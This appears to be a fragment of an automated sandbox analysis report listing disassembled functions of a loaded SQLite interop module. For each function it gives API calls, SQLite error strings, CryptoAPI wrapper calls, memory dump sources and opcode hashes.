                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(non-query: [%s],00000000), ref: 6C3E703E
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,000000FF,000000FF,00000001,000000FF), ref: 6C3E706E
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C3E715C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9c6d7cd7b7d38055.$I1c7a7970970b9619.I4983499b64278231.I943321d364f02e5d.Ia3f7b31190ce0815.If8364af380546f2d.Ifc350ae509dc2b53.
                                                                                      • String ID: B%d:$F$I$S%d:$T%d:$error SQL statement [%s]: %s$non-query: [%s]$string or blob too big
                                                                                      • API String ID: 2091174193-670901244
                                                                                      • Opcode ID: 9884270ab2071107779fe444fdeb2064fd42dfa1bc692be5125a4e32175b41cd
                                                                                      • Instruction ID: 9e55c806c66736959bd4bdd979c67bd42b0e62e2a93f55e344545484fccf1b17
                                                                                      • Opcode Fuzzy Hash: 9884270ab2071107779fe444fdeb2064fd42dfa1bc692be5125a4e32175b41cd
                                                                                      • Instruction Fuzzy Hash: 25C104716083509BD710CB24DC41FAFBBA1EBC6328F144A6DE49997B82DB359509CBE3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4AC250 Relevance: 19.8, APIs: 1, Strings: 10, Instructions: 582COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000174EF,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4AC9BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$misuse$no such column: "%s"
                                                                                      • API String ID: 1952225102-479222247
                                                                                      • Opcode ID: b9113f2d598f8d9aec1ca669e12a83fed5caa4e307d634964edf7b6d4cf2b55d
                                                                                      • Instruction ID: e9c4df75adb3ca5933749b1272b676679430e9dca614286f52ad03df63a42873
                                                                                      • Opcode Fuzzy Hash: b9113f2d598f8d9aec1ca669e12a83fed5caa4e307d634964edf7b6d4cf2b55d
                                                                                      • Instruction Fuzzy Hash: 8332E370A047018FC755EF68C880E6BBBF1BFA9309F15491DE8958BB15D732E846CB86
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EA860 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 331COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,000000FF,00000000), ref: 6C3EA95E
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,?,00000000,?), ref: 6C3EA9C6
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,?,00000000), ref: 6C3EAA01
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,000000FF,00000000), ref: 6C3EAB66
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1527d54f96ad891e.I9196a02c851acbfb.
                                                                                      • String ID: .%.*s$[%d]$string or blob too big
                                                                                      • API String ID: 9462023-1741449051
                                                                                      • Opcode ID: a16778b153955a63d15f6fcdb8019ba903ea77ab2833bb52c84b015b431ab475
                                                                                      • Instruction ID: 033ec59f2313c0ccba2c4e6eac96ae7b22c0393e309a8e2daf8d193edfedbb92
                                                                                      • Opcode Fuzzy Hash: a16778b153955a63d15f6fcdb8019ba903ea77ab2833bb52c84b015b431ab475
                                                                                      • Instruction Fuzzy Hash: 1DA109727082144FD714DF24E851BBBB7E1EB8922CF54466FD89E86B81DB31A409CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C442D00 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 283COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(SELECT * FROM %Q.%Q,?), ref: 6C442D1F
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,?,?,?,?,6C44237C,?,?,?), ref: 6C442D76
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014F4C,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,?,?,?,?), ref: 6C442DEA
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014F4C,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,?,?,?,?), ref: 6C442F24
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: %s at line %d of [%.10s]$SELECT * FROM %Q.%Q$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse$|#Dl
                                                                                      • API String ID: 3388147725-1406782351
                                                                                      • Opcode ID: 8b08438bc577db7a971bccad7bda4c75a4aa4dbf1d20a7414ff58fd40f5de32a
                                                                                      • Instruction ID: b4ab85656fbfcbcd8d0aef7883ee7dae18063ef173e467bead1c2a7f4b3e95bd
                                                                                      • Opcode Fuzzy Hash: 8b08438bc577db7a971bccad7bda4c75a4aa4dbf1d20a7414ff58fd40f5de32a
                                                                                      • Instruction Fuzzy Hash: 27A1A2716083518BE720CF25C888F5BB7E1EF89319F258A2DE899D7B41DB30D946C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3E5C60 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 116encryptionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000), ref: 6C3E5CD8
                                                                                      • GetLastError.KERNEL32 ref: 6C3E5CE2
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(CryptAcquireContext failed, code=%lu,00000000), ref: 6C3E5CEE
                                                                                        • Part of subcall function 6C3E5DC0: CryptReleaseContext.ADVAPI32(00000000,00000000,00000000,?,6C3E5CFE,00000000,CryptAcquireContext failed, code=%lu,00000000), ref: 6C3E5DDA
                                                                                        • Part of subcall function 6C3E5DC0: SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000,?,6C3E5CFE,00000000,CryptAcquireContext failed, code=%lu,00000000), ref: 6C3E5DE7
                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6C3E5D97
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C3E5DA4
                                                                                      Strings
                                                                                      • cryptoapi_decrypt, xrefs: 6C3E5D19
                                                                                      • CryptAcquireContext failed, code=%lu, xrefs: 6C3E5CE9
                                                                                      • cryptoapi_encrypt, xrefs: 6C3E5D53
                                                                                      • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 6C3E5CC5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextCrypt$Ifc350ae509dc2b53.Release$AcquireErrorI1c7a7970970b9619.Last
                                                                                      • String ID: CryptAcquireContext failed, code=%lu$Microsoft Enhanced Cryptographic Provider v1.0$cryptoapi_decrypt$cryptoapi_encrypt
                                                                                      • API String ID: 127211342-3603160501
                                                                                      • Opcode ID: 2d83f734b94cd8ff7b7c238a99ab4e92dcbc2fb3a9622b3e79b6b5ded47126a0
                                                                                      • Instruction ID: 2a8f15dc4bdee0a40b6c6d9dd909ccb2622b46459e3f96fa7f9543d1e5e81fc0
                                                                                      • Opcode Fuzzy Hash: 2d83f734b94cd8ff7b7c238a99ab4e92dcbc2fb3a9622b3e79b6b5ded47126a0
                                                                                      • Instruction Fuzzy Hash: 4C31FC717403146BE7209A259C09F9B77E8DF48719F20462AFD48DABC0FBB1A4448BD6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C424190 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 379COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,00000000), ref: 6C424467
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,00000000), ref: 6C42446F
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4244AA
                                                                                      • misuse, xrefs: 6C4244A5
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C42449B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I9c6d7cd7b7d38055.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1466908741-1203237178
                                                                                      • Opcode ID: 607601c6e877dd369d2bf15769849a8075e7dff160aee0bc86f6f59c6a936ca4
                                                                                      • Instruction ID: 03e748a8fe219dba04083a071422c6f5fe115c6326e3aa0a170c8d85c67dda83
                                                                                      • Opcode Fuzzy Hash: 607601c6e877dd369d2bf15769849a8075e7dff160aee0bc86f6f59c6a936ca4
                                                                                      • Instruction Fuzzy Hash: 06E1F331A093408BC701CF35C482D5AB7A1EF8A389F145B5EE895ABB51D739D886CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C45E8D0 Relevance: 11.3, APIs: 1, Strings: 4, Instructions: 2580COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Expression tree is too large (maximum depth %d)$INDEX %d$MULTI-INDEX OR$gfff
                                                                                      • API String ID: 0-510439031
                                                                                      • Opcode ID: 2e3e86d6d96ff6f729393d407c439ca7a25a18ed6500d25c7998775c6791424c
                                                                                      • Instruction ID: 6da0f310e648d63b0fb0c982638f9a33ad4f350f2d031d4730b0a99e46d54694
                                                                                      • Opcode Fuzzy Hash: 2e3e86d6d96ff6f729393d407c439ca7a25a18ed6500d25c7998775c6791424c
                                                                                      • Instruction Fuzzy Hash: 84436C746093418FD315CF29C480F6ABBF1BF89308F54895DE8998BBA1D735E856CB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C42AF80 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 398COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP ref: 6C42AFFE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I943321d364f02e5d.
                                                                                      • String ID: abort due to ROLLBACK$another row available$no more rows available$string or blob too big$unknown error
                                                                                      • API String ID: 1102784474-2257376340
                                                                                      • Opcode ID: b56e275d9f0ebf4e7c996c3224b9ab5e2f91c8c477a8bfee3dd3829ee94845e7
                                                                                      • Instruction ID: 12459c0baecc0e5aeea151a28196821f1a50e8c29bc55e83ee1e4ac7fa04d3de
                                                                                      • Opcode Fuzzy Hash: b56e275d9f0ebf4e7c996c3224b9ab5e2f91c8c477a8bfee3dd3829ee94845e7
                                                                                      • Instruction Fuzzy Hash: 30F18F71A093018BD714CF28C846F6AB7F0BF89318F15462DF8AA97B50D734E985CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C45C640 Relevance: 9.8, Strings: 7, Instructions: 1021COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,$2$BINARY$Expression tree is too large (maximum depth %d)$NOCASE$ON clause references tables to its right$false
                                                                                      • API String ID: 0-4026243403
                                                                                      • Opcode ID: 067cbe428d39470fe3c0f0c14d7efd29cb204a126d7e7be0c4e6b122b51c16a7
                                                                                      • Instruction ID: 6924d8e9df076c46b78091c8e98b6fb566cf2aa6ced89a2f3fdbfec56374b3dc
                                                                                      • Opcode Fuzzy Hash: 067cbe428d39470fe3c0f0c14d7efd29cb204a126d7e7be0c4e6b122b51c16a7
                                                                                      • Instruction Fuzzy Hash: 70925B74A083418FD714DF28C580F1BBBE1BF89308F548A6DE8998BB91D771E855CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4BEB00 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 566COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00012CC2,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4BEB29
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4BEB22
                                                                                      • misuse, xrefs: 6C4BEB1D
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4BEB13
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 2e053b7e36638d3ac81f45999ad232d27435f1c854534ca538be167daa2685f2
                                                                                      • Instruction ID: a3de995f542e6f7168564b35958bfb3a9d623364f578626fd09fe9dcec161545
                                                                                      • Opcode Fuzzy Hash: 2e053b7e36638d3ac81f45999ad232d27435f1c854534ca538be167daa2685f2
                                                                                      • Instruction Fuzzy Hash: A7229E75A052119FD714CF19C8C0E1AB7F1AFC8319F1986A8E859AB752D731EC41CBE2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3D8CA8 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,76229350,6C3D386B,76229350,00000000,?,6C3D53E3,00000115,00000000,76229350,00000000), ref: 6C3D8CAC
                                                                                      • _free.LIBCMT ref: 6C3D8CDF
                                                                                      • _free.LIBCMT ref: 6C3D8D07
                                                                                      • SetLastError.KERNEL32(00000000,00000000,76229350,00000000), ref: 6C3D8D14
                                                                                      • SetLastError.KERNEL32(00000000,00000000,76229350,00000000), ref: 6C3D8D20
                                                                                      • _abort.LIBCMT ref: 6C3D8D26
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: d0b3db9f8bf3545ae1bfff296a155c2941a55ea1fd91637d46ec5fec221bc430
                                                                                      • Instruction ID: 6d3e9d1233ed1f81d17ddfc30e66ab55152d052c0e52bdf244b9bbdf217a5d96
                                                                                      • Opcode Fuzzy Hash: d0b3db9f8bf3545ae1bfff296a155c2941a55ea1fd91637d46ec5fec221bc430
                                                                                      • Instruction Fuzzy Hash: 96F0F937245601ABD60276396C08B8B6139AFC366DF270156F954D3F88EF22B80989A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C45A9F0 Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 830COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000011C,automatic index on %s(%s),?,?), ref: 6C45ABFE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: BINARY$C$automatic index on %s(%s)
                                                                                      • API String ID: 1952225102-1483224787
                                                                                      • Opcode ID: 1379b26580c649ad52a57dfb0aedf1dc6dcaa8ffa73b95765eec645418709ece
                                                                                      • Instruction ID: 5870bfc9f61e36837f46c23e2e5b946da196b1057104529533e421a6c746d2f4
                                                                                      • Opcode Fuzzy Hash: 1379b26580c649ad52a57dfb0aedf1dc6dcaa8ffa73b95765eec645418709ece
                                                                                      • Instruction Fuzzy Hash: C5826674A083018FD714DF18C490F2ABBE2FF89308F558A9DE8958B762D771E856CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3DA081 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6C4EA474), ref: 6C3DA0EB
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,6C513D6C,000000FF,00000000,0000003F,00000000,?,?), ref: 6C3DA163
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,6C513DC0,000000FF,?,0000003F,00000000,?), ref: 6C3DA190
                                                                                      • _free.LIBCMT ref: 6C3DA0D9
                                                                                        • Part of subcall function 6C3D7AF4: HeapFree.KERNEL32(00000000,00000000,?,6C3D7761,00000001,00000001), ref: 6C3D7B0A
                                                                                        • Part of subcall function 6C3D7AF4: GetLastError.KERNEL32(78A8D6F6,?,6C3D7761,00000001,00000001), ref: 6C3D7B1C
                                                                                      • _free.LIBCMT ref: 6C3DA2A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 1286116820-0
                                                                                      • Opcode ID: ad245cf3b83931362d24d4f06e98dee8d729c9e50cf88711998b46d9155ad5f2
                                                                                      • Instruction ID: 55fba7fd41c08f8fb89c8ea3671384abeb69d914a81f163e3592e5cbe9c2067e
                                                                                      • Opcode Fuzzy Hash: ad245cf3b83931362d24d4f06e98dee8d729c9e50cf88711998b46d9155ad5f2
                                                                                      • Instruction Fuzzy Hash: 25510973A00209EFDF10DF69CD8599EB7BCEF46754B12026AD46097A90EB31AA44CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C47E740 Relevance: 6.4, Strings: 3, Instructions: 2679COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s.%s$%s.rowid$5
                                                                                      • API String ID: 0-2959728198
                                                                                      • Opcode ID: 176c77b574ffdd1fb56c74bb39ed033da7b7e1facbd77f46721a9197369a97a1
                                                                                      • Instruction ID: eabb66d4c27c9f7df1e874db49c1142bd976ec11462d5b3a518bb3173b608a34
                                                                                      • Opcode Fuzzy Hash: 176c77b574ffdd1fb56c74bb39ed033da7b7e1facbd77f46721a9197369a97a1
